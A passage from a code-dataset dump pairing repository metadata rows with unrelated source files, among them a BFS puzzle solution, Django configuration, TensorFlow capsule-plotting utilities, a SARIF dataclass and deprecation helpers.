result=result.split(' ')
output=result[4]
output=int(output)
self.failIfEqual(output,0,"Permit Outbound TCP Failed")
# Checking SSX Health
hs = self.ssx.get_health_stats()
self.failUnless(is_healthy( hs), "Platform is not healthy")
if __name__ == '__main__':
filename = os.path.split(__file__)[1].replace('.py','.log')
log = buildLogger(filename, debug=True, console=True)
suite = test_suite()
suite.addTest(test_ACL_FUN_055)
test_runner(stream = sys.stdout).run(suite)
| [
"[email protected]"
] | |
f9d76b0440856d9311fe34261caa26b0b7aebe92 | 882c865cf0a4b94fdd117affbb5748bdf4e056d0 | /python/BOJ/10_DFS_BFS/BOJ1697_숨바꼭질2.py | bc86af4e46dc7af94108fb47b8aaa7168c43897e | [] | no_license | minhee0327/Algorithm | ebae861e90069e2d9cf0680159e14c833b2f0da3 | fb0d3763b1b75d310de4c19c77014e8fb86dad0d | refs/heads/master | 2023-08-15T14:55:49.769179 | 2021-09-14T04:05:11 | 2021-09-14T04:05:11 | 331,007,037 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 950 | py | from collections import deque
N, K = map(int, input().split())
count = [0] * 100001
def bfs(x):
need_visit = deque([x])
while need_visit:
x = need_visit.popleft()
dx = [x-1, x+1, x*2]
if x == K:
return count[x]
for nx in dx:
if nx < 0 or nx > 100000:
continue
elif not count[nx]:
need_visit.append(nx)
                count[nx] = count[x] + 1  # only when not yet visited: previous depth + 1
print(bfs(N))
# print(count)
'''
1. Switching to deque cut the runtime by more than half..!
2. On speed:
    - list: pop(0) costs O(N)
    - deque: can pop from both ends in O(1)
3. Use the deque data structure when many pop(0) calls are needed
4. Use the sys.stdin.readline() speed-up when a lot of input must be read (it makes little difference for small inputs)
'''
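# A minimal timing sketch (not part of the original solution) backing note 2 above:
# list.pop(0) shifts every remaining element (O(N)); deque.popleft() does not (O(1)).
import timeit
t_list = timeit.timeit('q.pop(0)', setup='q = list(range(200000))', number=100000)
t_deque = timeit.timeit('q.popleft()',
                        setup='from collections import deque; q = deque(range(200000))',
                        number=100000)
print(t_list, t_deque)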
| [
"[email protected]"
] | |
0c62175729789e521b514d0ac7abca4b662ba72a | 3c5e4086ff49fb28be692085855c63b624b00d37 | /SuccessiveCommunities_IPAM/commonUsers.py | 63a4f0bf34dfa4d52a609f79cf37b7eff868da7d | [] | no_license | Roja-B/IPAM | bd1a708f053912ce401a99cbe827f2503eae9446 | 5a0e49299abcccda9eb1e7cc523315e6c14d5def | refs/heads/master | 2016-08-08T05:09:02.910761 | 2013-02-06T06:01:11 | 2013-02-06T06:01:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,092 | py |
# Unipartite Projection
# Creates Unipartite graph using Jaccard Index from a bipartite graph
# Input: Bipartite Graph
# Form: "EdgeList"
import sys
from string import lower,upper
from PARAMETERS import *
bgraphname = PATH+"/myResults/20002012/bipartite.txt"
f1 = open(bgraphname,"r")
Participants = dict()
for line in f1:
L1 = line.strip().split("\t")
program = upper(L1[0])
participant = L1[1]
try: Participants[program].add(participant)
except KeyError:
Participants[program] = set()
Participants[program].add(participant)
f1.close()
print "IPAM data has been loaded."
Answer = raw_input('Would you like to see participant overlaps between two programs? Enter y or n: ')
while Answer == 'y':
prog1 = raw_input('Enter first program: ')
prog2 = raw_input('Enter second program: ')
CommonParticipants = set.intersection(Participants[upper(prog1)],Participants[upper(prog2)])
print "People who participated in both programs are as follows:"
print list(CommonParticipants)
Answer = raw_input('Enter y if you want to enter two other programs, otherwise press any key: ')
| [
"[email protected]"
] | |
e6f1aa570bf7102147e51ae3fc964e0a6563e419 | 4dcdc0533b89af0160bb13f729b1fb7be1454e6e | /Topics/Identity testing/Check the truth/main.py | d290b0cff6723c99e75d9e3e98bc17ccd891dc21 | [] | no_license | alendina/Numeric_Matrix | 17227221d27278825868df8d78969ee7b6febca6 | 74b8ff3365eba858b6974f01812bfe2ca041b91c | refs/heads/master | 2023-08-18T06:38:24.145454 | 2021-10-24T18:33:05 | 2021-10-24T18:33:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | def check_values(first_value, second_value):
if bool(first_value) and bool(second_value):
return True
else:
return False
| [
"[email protected]"
] | |
8f7d70e38632a557f44e50d6671c469fd196770d | c2d48caa5db7e746a38beca625406fcf47379d3c | /src/olympia/lib/storage.py | 0413ca12fc2c4a45f994579b021cdea728b44eab | [] | permissive | mozilla/addons-server | 1f6269ec0a4aa5a0142a5f81978ef674daf213a7 | e0f043bca8a64478e2ba62f877c9dc28620be22f | refs/heads/master | 2023-09-01T09:34:41.867534 | 2023-09-01T07:21:22 | 2023-09-01T07:21:22 | 16,416,867 | 920 | 590 | BSD-3-Clause | 2023-09-14T16:15:01 | 2014-01-31T18:44:15 | Python | UTF-8 | Python | false | false | 733 | py | from django.contrib.staticfiles.storage import ManifestStaticFilesStorage
class ManifestStaticFilesStorageNotMaps(ManifestStaticFilesStorage):
patterns = (
(
'*.css',
(
# These regexs are copied from HashedFilesMixin in django4.1+
r"""(?P<matched>url\(['"]{0,1}\s*(?P<url>.*?)["']{0,1}\))""",
(
r"""(?P<matched>@import\s*["']\s*(?P<url>.*?)["'])""",
"""@import url("%(url)s")""",
),
# We are ommiting the sourceMappingURL regexs for .css and .js as they
# don't work how we copy over the souces in Makefile-docker.copy_node_js
),
),
)
| [
"[email protected]"
] | |
c923ea98b9bf69a7d382ae175dc5d64d8a9cebb3 | e10a6d844a286db26ef56469e31dc8488a8c6f0e | /stacked_capsule_autoencoders/capsules/plot.py | 433501db8dd6481b815ef5ee817b8978d36d3b7a | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | Jimmy-INL/google-research | 54ad5551f97977f01297abddbfc8a99a7900b791 | 5573d9c5822f4e866b6692769963ae819cb3f10d | refs/heads/master | 2023-04-07T19:43:54.483068 | 2023-03-24T16:27:28 | 2023-03-24T16:32:17 | 282,682,170 | 1 | 0 | Apache-2.0 | 2020-07-26T15:50:32 | 2020-07-26T15:50:31 | null | UTF-8 | Python | false | false | 10,874 | py | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Constellation plotting tools."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from sklearn.manifold import TSNE
import sonnet as snt
import tensorflow.compat.v1 as tf
import tensorflow_probability as tfp
_COLORS = """
#a6cee3
#1f78b4
#b2df8a
#33a02c
#fb9a99
#e31a1c
#fdbf6f
#ff7f00
#cab2d6
#6a3d9a
#ffff99
#b15928""".split()
def hex_to_rgb(value):
value = value.lstrip('#')
lv = len(value)
return tuple(int(value[i:i + lv // 3], 16) / 255.
for i in range(0, lv, lv // 3))
_COLORS = [c.strip() for c in _COLORS]
_COLORS = _COLORS[1::2] + _COLORS[::2]
_COLORS = np.asarray([hex_to_rgb(c) for c in _COLORS], dtype=np.float32)
def gaussian_blobs(params, height, width, norm='sum'):
"""Creates gaussian blobs on a canvas.
Args:
params: [B, 4] tensor, where entries represent (y, x, y_scale, x_scale).
height: int, height of the output.
width: int, width of the output.
norm: type of normalization to use; must be a postfix of some
tf.reduce_.* method.
Returns:
Tensor of shape [B, height, width].
"""
params = tf.expand_dims(params, -1)
uy, ux, sy, sx = tf.split(params, 4, -2)
rows = tf.range(tf.to_int32(height))
rows = tf.to_float(rows)[tf.newaxis, :, tf.newaxis]
cols = tf.range(tf.to_int32(width))
cols = tf.to_float(cols)[tf.newaxis, tf.newaxis, :]
dy = (rows - uy) / sy
dx = (cols - ux) / sx
z = tf.square(dy) + tf.square(dx)
mask = tf.exp(-.5 * z)
# normalize so that the contribution of each blob sums to one
# change this to `tf.reduce_max` if you want max value to be one
norm_func = getattr(tf, 'reduce_{}'.format(norm))
mask /= norm_func(mask, (1, 2), keep_dims=True) + 1e-8 # pylint:disable=not-callable
return mask
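# Usage sketch (illustrative values, not from the original module): a single blob
# centered at (y=14, x=14) with scale 3 on a 28x28 canvas; with the default
# norm='sum' each blob's contribution sums to ~1.
#   params = tf.constant([[14., 14., 3., 3.]])
#   mask = gaussian_blobs(params, height=28, width=28)  # -> shape [1, 28, 28]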
def gaussian_blobs_const_scale(params, scale, height, width, norm='sum'):
scale = tf.zeros_like(params[Ellipsis, :2]) + scale
params = tf.concat([params[Ellipsis, :2], scale], -1)
return gaussian_blobs(params, height, width, norm)
def denormalize_coords(coords, canvas_size, rounded=False):
coords = (coords + 1.) / 2. * np.asarray(canvas_size)[np.newaxis]
if rounded:
coords = tf.round(coords)
return coords
def render_by_scatter(size, points, colors=None, gt_presence=None):
  """Renders points using tf.scatter_nd."""
if colors is None:
colors = tf.ones(points.shape[:-1].as_list() + [3], dtype=tf.float32)
if gt_presence is not None:
colors *= tf.cast(tf.expand_dims(gt_presence, -1), colors.dtype)
batch_size, n_points = points.shape[:-1].as_list()
shape = [batch_size] + list(size) + [3]
batch_idx = tf.reshape(tf.range(batch_size), [batch_size, 1, 1])
batch_idx = snt.TileByDim([1], [n_points])(batch_idx)
idx = tf.concat([batch_idx, tf.cast(points, tf.int32)], -1)
return tf.scatter_nd(idx, colors, shape)
def render_constellations(pred_points,
capsule_num,
canvas_size,
gt_points=None,
n_caps=2,
gt_presence=None,
pred_presence=None,
                          caps_presence_prob=None):
  """Renders predicted and ground-truth points as gaussian blobs.
Args:
pred_points: [B, m, 2].
capsule_num: [B, m] tensor indicating which capsule the corresponding point
comes from. Plots from different capsules are plotted with different
colors. Currently supported values: {0, 1, ..., 11}.
canvas_size: tuple of ints
gt_points: [B, k, 2]; plots ground-truth points if present.
n_caps: integer, number of capsules.
gt_presence: [B, k] binary tensor.
pred_presence: [B, m] binary tensor.
caps_presence_prob: [B, m], a tensor of presence probabilities for caps.
Returns:
[B, *canvas_size] tensor with plotted points
"""
# convert coords to be in [0, side_length]
pred_points = denormalize_coords(pred_points, canvas_size, rounded=True)
# render predicted points
batch_size, n_points = pred_points.shape[:2].as_list()
capsule_num = tf.to_float(tf.one_hot(capsule_num, depth=n_caps))
capsule_num = tf.reshape(capsule_num, [batch_size, n_points, 1, 1, n_caps, 1])
color = tf.convert_to_tensor(_COLORS[:n_caps])
color = tf.reshape(color, [1, 1, 1, 1, n_caps, 3]) * capsule_num
color = tf.reduce_sum(color, -2)
color = tf.squeeze(tf.squeeze(color, 3), 2)
colored = render_by_scatter(canvas_size, pred_points, color, pred_presence)
# Prepare a vertical separator between predicted and gt points.
# Separator is composed of all supported colors and also serves as
# a legend.
# [b, h, w, 3]
n_colors = _COLORS.shape[0]
sep = tf.reshape(tf.convert_to_tensor(_COLORS), [1, 1, n_colors, 3])
n_tiles = int(colored.shape[2]) // n_colors
sep = snt.TileByDim([0, 1, 3], [batch_size, 3, n_tiles])(sep)
sep = tf.reshape(sep, [batch_size, 3, n_tiles * n_colors, 3])
pad = int(colored.shape[2]) - n_colors * n_tiles
pad, r = pad // 2, pad % 2
if caps_presence_prob is not None:
n_caps = int(caps_presence_prob.shape[1])
prob_pads = ([0, 0], [0, n_colors - n_caps])
caps_presence_prob = tf.pad(caps_presence_prob, prob_pads)
zeros = tf.zeros([batch_size, 3, n_colors, n_tiles, 3], dtype=tf.float32)
shape = [batch_size, 1, n_colors, 1, 1]
caps_presence_prob = tf.reshape(caps_presence_prob, shape)
prob_vals = snt.MergeDims(2, 2)(caps_presence_prob + zeros)
sep = tf.concat([sep, tf.ones_like(sep[:, :1]), prob_vals], 1)
sep = tf.pad(sep, [(0, 0), (1, 1), (pad, pad + r), (0, 0)],
constant_values=1.)
# render gt points
if gt_points is not None:
gt_points = denormalize_coords(gt_points, canvas_size, rounded=True)
gt_rendered = render_by_scatter(canvas_size, gt_points, colors=None,
gt_presence=gt_presence)
colored = tf.where(tf.cast(colored, bool), colored, gt_rendered)
colored = tf.concat([gt_rendered, sep, colored], 1)
res = tf.clip_by_value(colored, 0., 1.)
return res
def concat_images(img_list, sep_width, vertical=True):
"""Concatenates image tensors."""
if vertical:
sep = tf.ones_like(img_list[0][:, :sep_width])
else:
sep = tf.ones_like(img_list[0][:, :, :sep_width])
imgs = []
for i in img_list:
imgs.append(i)
imgs.append(sep)
imgs = imgs[:-1]
return tf.concat(imgs, 2 - vertical)
def apply_cmap(brightness, cmap):
indices = tf.cast(brightness * 255.0, tf.int32)
  # Make sure the indices stay within the 256-entry colormap (also guards NaN values).
  indices = tf.clip_by_value(indices, 0, 255)
cm = matplotlib.cm.get_cmap(cmap)
colors = tf.constant(cm.colors, dtype=tf.float32)
return tf.gather(colors, indices)
def render_activations(activations, height, pixels_per_caps=2, cmap='gray'):
"""Renders capsule activations as a colored grid.
Args:
activations: [B, n_caps] tensor, where every entry is in [0, 1].
height: int, height of the resulting grid.
pixels_per_caps: int, size of a single grid cell.
cmap: string: matplotlib-compatible cmap name.
Returns:
[B, height, width, n_channels] tensor.
"""
# convert activations to colors
if cmap == 'gray':
activations = tf.expand_dims(activations, -1)
else:
activations = apply_cmap(activations, cmap)
batch_size, n_caps, n_channels = activations.shape.as_list()
  # pad to fit a grid of prescribed height
n_rows = 1 + (height - pixels_per_caps) // (pixels_per_caps + 1)
n_cols = n_caps // n_rows + ((n_caps % n_rows) > 0)
n_pads = n_rows * n_cols - n_caps
activations = tf.pad(activations, [(0, 0), (0, n_pads), (0, 0)],
constant_values=1.)
  # tile to get the appropriate number of pixels to fill a pixels_per_caps^2 square
activations = snt.TileByDim([2], [pixels_per_caps**2])(
tf.expand_dims(activations, 2))
activations = tf.reshape(activations, [batch_size, n_rows, n_cols,
pixels_per_caps, pixels_per_caps,
n_channels])
# pad each cell with one white pixel on the bottom and on the right-hand side
activations = tf.pad(activations, [(0, 0), (0, 0), (0, 0), (0, 1), (0, 1),
(0, 0)], constant_values=1.)
# concat along row and col dimensions
activations = tf.concat(tf.unstack(activations, axis=1), axis=-3)
activations = tf.concat(tf.unstack(activations, axis=1), axis=-2)
  # either pad or truncate to get the correct height
if activations.shape[1] < height:
n_pads = height - activations.shape[1]
activations = tf.pad(activations, [(0, 0), (0, n_pads), (0, 0), (0, 0)])
else:
activations = activations[:, :height]
return activations
def correlation(x, y):
"""Computes correlation between x and y.
Args:
x: [B, m],
y: [B, n]
Returns:
corr_xy [m, n]
"""
# [B, m+n]
m = int(x.shape[-1])
xy = tf.concat([x, y], -1)
# [m+n, m+n]
corr = tfp.stats.correlation(xy, sample_axis=0)
corr_xy = corr[:m, m:]
return corr_xy
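# Shape sketch (illustrative): for x with shape [B, m] and y with shape [B, n],
#   corr = correlation(x, y)  # -> shape [m, n]; entry (i, j) correlates x[:, i] and y[:, j]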
def make_tsne_plot(caps_presence, labels, filename=None, save_kwargs=None):
"""Makes a TSNE plot."""
# idx = np.random.choice(res.test.posterior_pres.shape[0], size=int(1e4),
# replace=False)
# points = res.train.posterior_pres[idx]
# labels = res.train.label[idx]
tsne = TSNE(2, perplexity=50)
embedded = tsne.fit_transform(caps_presence)
colors = np.asarray([
166, 206, 227,
31, 120, 180,
178, 223, 138,
51, 160, 44,
251, 154, 153,
227, 26, 28,
253, 191, 111,
255, 127, 0,
202, 178, 214,
106, 61, 154
], dtype=np.float32).reshape(10, 3) / 255.
fig, ax = plt.subplots(1, 1, figsize=(6, 6))
for i in range(10):
idx = (labels == i)
points_for_label = embedded[idx]
ax.scatter(points_for_label[:, 0], points_for_label[:, 1], c=colors[i])
if filename is not None:
if save_kwargs is None:
save_kwargs = dict(bbox_inches='tight', dpi=300)
fig.savefig(filename, **save_kwargs)
plt.close(fig)
| [
"[email protected]"
] | |
c46fe73e6b759e76d94ab70e318253601e5e12b7 | 67f19ebb1fb3189e4c2f99484c1dc13af5099edb | /wii_packages/enso/fever/fever_idol7/fever_idol7.py | 9e8af364fb989f103457962cc724befb394fa6d4 | [] | no_license | delguoqing/PyLMPlayer | 609c4fe35e56e4ce3ce30eeb2e9244aad5ea1609 | db8a1edf70ac1c11deffddc458788b3a2c2078df | refs/heads/master | 2021-01-22T05:06:00.491732 | 2013-09-13T04:54:23 | 2013-09-13T04:54:23 | 8,878,510 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | def func0(this, _global):
this.stop()
def func1(this, _global):
this.gotoAndPlay("fever")
def func2(this, _global):
this.gotoAndStop(0)
def func3(this, _global):
this.gotoAndPlay("feverWide")
DATA = (
func0,
func1,
func2,
func3,
) | [
"[email protected]"
] | |
9f0d2bf444ffbf8b751a89dbae76aa88747bb009 | e6c7c0fe8ff901b02c02c8cfb342cc2bcd76a8b2 | /lambda_p.py | 0eb68693ab8a4e9920821997994dbc0c829f235e | [] | no_license | VladyslavHnatchenko/theory | d7a3803e7887e60beb2936f24b9eb4056a04a711 | d2a18d577c046b896fcab86684d9011db1d4867d | refs/heads/master | 2020-04-08T10:42:55.198754 | 2018-12-25T06:00:17 | 2018-12-25T06:00:17 | 159,279,432 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,550 | py | def multiply_all(numbers):
product = 1
for n in numbers:
product *= n
return product
numbers = [2, 1, 3, 4, 7, 11, 18]
product = multiply_all(numbers)
print(product)
# from functools import reduce
#
#
# numbers = [2, 1, 3, 4, 7, 11, 18]
# product = reduce(lambda x, y: x * y, numbers, 1)
#
# print(product)
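# An equivalent sketch using operator.mul instead of the lambda (assumes the same
# numbers list as above):
# from functools import reduce
# import operator
# product = reduce(operator.mul, numbers, 1)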
# numbers = [2, 1, 3, 4, 7, 11, 18]
# squared_numbers = (n**2 for n in numbers)
# odd_numbers = (n for n in numbers if n % 2 == 1)
# print(odd_numbers)
# print(squared_numbers)
# print(numbers)
# numbers = [2, 1, 3, 4, 7, 11, 18]
# squared_numbers = map(lambda n: n**2, numbers)
# odd_numbers = filter(lambda n: n % 2 == 1, numbers)
# print(squared_numbers)
# print(odd_numbers)
# print(numbers)
# def color_of_point(point):
# (x, y), color = point
# return color
#
#
# points = [((1, 2), 'red'), ((3, 4), 'green')]
# points_by_color = sorted(points, key=color_of_point)
# print(points_by_color)
# def length_and_alphabetical(string):
# return len(string), string.casefold()
#
#
# colors = (["Goldenrod", "Purple", "Salmon", "Turquoise", "Cyan"])
# colors_by_length = sorted(colors, key=length_and_alphabetical)
# print(colors_by_length)
# colors = (["Goldenrod", "Purple", "Salmon", "Turquoise", "Cyan"])
# print(sorted(colors, key=lambda s: s.casefold()))
# normalized_colors = map(lambda s: s.casefold(), colors)
# colors = ["Goldenrod", "Purple", "Salmon", "Turquoise", "Cyan"]
#
#
# def normalize_case(string):
# return string.casefold()
#
#
# normalized_colors = map(normalize_case, colors)
| [
"[email protected]"
] | |
712c35310d6dded71e8bb56fe425b5331e450d82 | 7fa08c93ff0caa4c86d4fa1727643331e081c0d0 | /brigid_api_client/models/aws_accounts_retrieve_expand.py | affdf90386d13f2fa7f0cb41d10e07e378faf6b2 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | caltechads/brigid-api-client | 760768c05280a4fb2f485e27c05f6ae24fbb7c6f | 3e885ac9e7b3c00b8a9e0cc1fb7b53b468d9e10a | refs/heads/master | 2023-03-23T03:11:02.446720 | 2021-03-13T00:47:03 | 2021-03-13T00:47:03 | 338,424,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | from enum import Enum
class AwsAccountsRetrieveExpand(str, Enum):
AWSACCOUNTAWS_VPCS = "awsaccount.aws_vpcs"
AWSACCOUNTCONTACTS = "awsaccount.contacts"
AWSACCOUNTTEAM = "awsaccount.team"
def __str__(self) -> str:
return str(self.value)
| [
"[email protected]"
] | |
d9400873abaf5962c7e4757d1c542489ceeebce1 | 360a83e36c064d37c0ceeded47edb257157c0702 | /django_cadastro/urls.py | 63e3f9aaf041bf0b1c2752e84429e7806f0f275d | [] | no_license | rafa-souza-dev/django_cadastros | 164ffc1f0000a311ae73d704bde4fe748dd7adf4 | ea0f84198a455e06c9476de0309da91f51cd700d | refs/heads/master | 2023-03-29T07:51:20.740625 | 2021-04-01T19:43:38 | 2021-04-01T19:43:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | """django_cadastro URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.urls import include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('cadastro.urls'))
]
| [
"[email protected]"
] | |
7ce76357c170555ecbb807b767bd856eaf8da2cc | afd2087e80478010d9df66e78280f75e1ff17d45 | /torch/onnx/_internal/diagnostics/infra/sarif/_fix.py | 5e3b944aa23983b9fbaa1e7015921124ae0f7c75 | [
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] | permissive | pytorch/pytorch | 7521ac50c47d18b916ae47a6592c4646c2cb69b5 | a6f7dd4707ac116c0f5fb5f44f42429f38d23ab4 | refs/heads/main | 2023-08-03T05:05:02.822937 | 2023-08-03T00:40:33 | 2023-08-03T04:14:52 | 65,600,975 | 77,092 | 24,610 | NOASSERTION | 2023-09-14T21:58:39 | 2016-08-13T05:26:41 | Python | UTF-8 | Python | false | false | 1,069 | py | # DO NOT EDIT! This file was generated by jschema_to_python version 0.0.1.dev29,
# with extension for dataclasses and type annotation.
from __future__ import annotations
import dataclasses
from typing import List, Optional
from torch.onnx._internal.diagnostics.infra.sarif import (
_artifact_change,
_message,
_property_bag,
)
@dataclasses.dataclass
class Fix(object):
"""A proposed fix for the problem represented by a result object. A fix specifies a set of artifacts to modify. For each artifact, it specifies a set of bytes to remove, and provides a set of new bytes to replace them."""
artifact_changes: List[_artifact_change.ArtifactChange] = dataclasses.field(
metadata={"schema_property_name": "artifactChanges"}
)
description: Optional[_message.Message] = dataclasses.field(
default=None, metadata={"schema_property_name": "description"}
)
properties: Optional[_property_bag.PropertyBag] = dataclasses.field(
default=None, metadata={"schema_property_name": "properties"}
)
# flake8: noqa
| [
"[email protected]"
] | |
e7d7c4854b2c5775a583cb11250ffe5044996f9e | ac235a23f22be0d6f1818bb53902177f9969813a | /ddtrace/vendor/debtcollector/moves.py | 8fac7543ff67b6e20f85f3795013883d832dc1b4 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | DataDog/dd-trace-py | f09d6d48c4c69aea68f999fc8a458ade5c6150cf | 1e3bd6d4edef5cda5a0831a6a7ec8e4046659d17 | refs/heads/1.x | 2023-09-01T20:25:26.746324 | 2023-09-01T18:54:37 | 2023-09-01T18:54:37 | 61,572,326 | 461 | 426 | NOASSERTION | 2023-09-14T20:38:57 | 2016-06-20T18:52:23 | Python | UTF-8 | Python | false | false | 8,421 | py | # -*- coding: utf-8 -*-
# Copyright (C) 2015 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import inspect
import six
from .. import wrapt
from . import _utils
_KIND_MOVED_PREFIX_TPL = "%s '%s' has moved to '%s'"
_CLASS_MOVED_PREFIX_TPL = "Class '%s' has moved to '%s'"
_MOVED_CALLABLE_POSTFIX = "()"
_FUNC_MOVED_PREFIX_TPL = "Function '%s' has moved to '%s'"
def _moved_decorator(kind, new_attribute_name, message=None,
version=None, removal_version=None, stacklevel=3,
attr_postfix=None, category=None):
"""Decorates a method/property that was moved to another location."""
def decorator(f):
fully_qualified, old_attribute_name = _utils.get_qualified_name(f)
if attr_postfix:
old_attribute_name += attr_postfix
@wrapt.decorator
def wrapper(wrapped, instance, args, kwargs):
base_name = _utils.get_class_name(wrapped, fully_qualified=False)
if fully_qualified:
old_name = old_attribute_name
else:
old_name = ".".join((base_name, old_attribute_name))
new_name = ".".join((base_name, new_attribute_name))
prefix = _KIND_MOVED_PREFIX_TPL % (kind, old_name, new_name)
out_message = _utils.generate_message(
prefix, message=message,
version=version, removal_version=removal_version)
_utils.deprecation(out_message, stacklevel=stacklevel,
category=category)
return wrapped(*args, **kwargs)
return wrapper(f)
return decorator
def moved_function(new_func, old_func_name, old_module_name,
message=None, version=None, removal_version=None,
stacklevel=3, category=None):
"""Deprecates a function that was moved to another location.
This generates a wrapper around ``new_func`` that will emit a deprecation
warning when called. The warning message will include the new location
to obtain the function from.
"""
new_func_full_name = _utils.get_callable_name(new_func)
new_func_full_name += _MOVED_CALLABLE_POSTFIX
old_func_full_name = ".".join([old_module_name, old_func_name])
old_func_full_name += _MOVED_CALLABLE_POSTFIX
prefix = _FUNC_MOVED_PREFIX_TPL % (old_func_full_name, new_func_full_name)
out_message = _utils.generate_message(prefix,
message=message, version=version,
removal_version=removal_version)
@six.wraps(new_func, assigned=_utils.get_assigned(new_func))
def old_new_func(*args, **kwargs):
_utils.deprecation(out_message, stacklevel=stacklevel,
category=category)
return new_func(*args, **kwargs)
old_new_func.__name__ = old_func_name
old_new_func.__module__ = old_module_name
return old_new_func
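# Usage sketch (names below are illustrative, not part of this package):
#   def renamed_helper():
#       ...
#   old_helper = moved_function(renamed_helper, 'old_helper', 'legacy.module')
# Calling old_helper() emits a deprecation warning, then delegates to renamed_helper().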
class moved_read_only_property(object):
"""Descriptor for read-only properties moved to another location.
This works like the ``@property`` descriptor but can be used instead to
provide the same functionality and also interact with the :mod:`warnings`
module to warn when a property is accessed, so that users of those
properties can know that a previously read-only property at a prior
location/name has moved to another location/name.
:param old_name: old attribute location/name
:param new_name: new attribute location/name
:param version: version string (represents the version this deprecation
was created in)
:param removal_version: version string (represents the version this
deprecation will be removed in); a string
of '?' will denote this will be removed in
some future unknown version
:param stacklevel: stacklevel used in the :func:`warnings.warn` function
to locate where the users code is when reporting the
deprecation call (the default being 3)
:param category: the :mod:`warnings` category to use, defaults to
:py:class:`DeprecationWarning` if not provided
"""
def __init__(self, old_name, new_name,
version=None, removal_version=None,
stacklevel=3, category=None):
self._old_name = old_name
self._new_name = new_name
self._message = _utils.generate_message(
"Read-only property '%s' has moved"
" to '%s'" % (self._old_name, self._new_name),
version=version, removal_version=removal_version)
self._stacklevel = stacklevel
self._category = category
def __get__(self, instance, owner):
_utils.deprecation(self._message,
stacklevel=self._stacklevel,
category=self._category)
# This handles the descriptor being applied on a
# instance or a class and makes both work correctly...
if instance is not None:
real_owner = instance
else:
real_owner = owner
return getattr(real_owner, self._new_name)
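# Usage sketch (illustrative class): keep the old attribute name alive while the
# data lives under the new property:
#   class Server(object):
#       @property
#       def ip(self):
#           return self._ip
#       ip_address = moved_read_only_property('ip_address', 'ip')
# Reading server.ip_address warns, then returns server.ip.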
def moved_method(new_method_name, message=None,
version=None, removal_version=None, stacklevel=3,
category=None):
"""Decorates an *instance* method that was moved to another location."""
if not new_method_name.endswith(_MOVED_CALLABLE_POSTFIX):
new_method_name += _MOVED_CALLABLE_POSTFIX
return _moved_decorator('Method', new_method_name, message=message,
version=version, removal_version=removal_version,
stacklevel=stacklevel,
attr_postfix=_MOVED_CALLABLE_POSTFIX,
category=category)
def moved_property(new_attribute_name, message=None,
version=None, removal_version=None, stacklevel=3,
category=None):
"""Decorates an *instance* property that was moved to another location."""
return _moved_decorator('Property', new_attribute_name, message=message,
version=version, removal_version=removal_version,
stacklevel=stacklevel, category=category)
def moved_class(new_class, old_class_name, old_module_name,
message=None, version=None, removal_version=None,
stacklevel=3, category=None):
"""Deprecates a class that was moved to another location.
This creates a 'new-old' type that can be used for a
deprecation period that can be inherited from. This will emit warnings
when the old locations class is initialized, telling where the new and
improved location for the old class now is.
"""
if not inspect.isclass(new_class):
_qual, type_name = _utils.get_qualified_name(type(new_class))
raise TypeError("Unexpected class type '%s' (expected"
" class type only)" % type_name)
old_name = ".".join((old_module_name, old_class_name))
new_name = _utils.get_class_name(new_class)
prefix = _CLASS_MOVED_PREFIX_TPL % (old_name, new_name)
out_message = _utils.generate_message(
prefix, message=message, version=version,
removal_version=removal_version)
def decorator(f):
@six.wraps(f, assigned=_utils.get_assigned(f))
def wrapper(self, *args, **kwargs):
_utils.deprecation(out_message, stacklevel=stacklevel,
category=category)
return f(self, *args, **kwargs)
return wrapper
old_class = type(old_class_name, (new_class,), {})
old_class.__module__ = old_module_name
old_class.__init__ = decorator(old_class.__init__)
return old_class
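# Usage sketch (illustrative module layout): keep the old import location working
# during the deprecation period:
#   # in old_module.py
#   OldThing = moved_class(NewThing, 'OldThing', 'old_module')
# Instantiating OldThing() warns and otherwise behaves like NewThing.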
| [
"[email protected]"
] | |
e115e1d148d03af970ec8a9f6f8a834f3d8cbf5b | 9610621437f025aa97f99b67f0a5d8e13bbb715c | /com/vmware/nsx_policy/infra/tier_0s/locale_services/l2vpn_context/l2vpns_client.py | 37e0e1746854f7e9d4a3f17ef29d108a076bcd0d | [
"MIT"
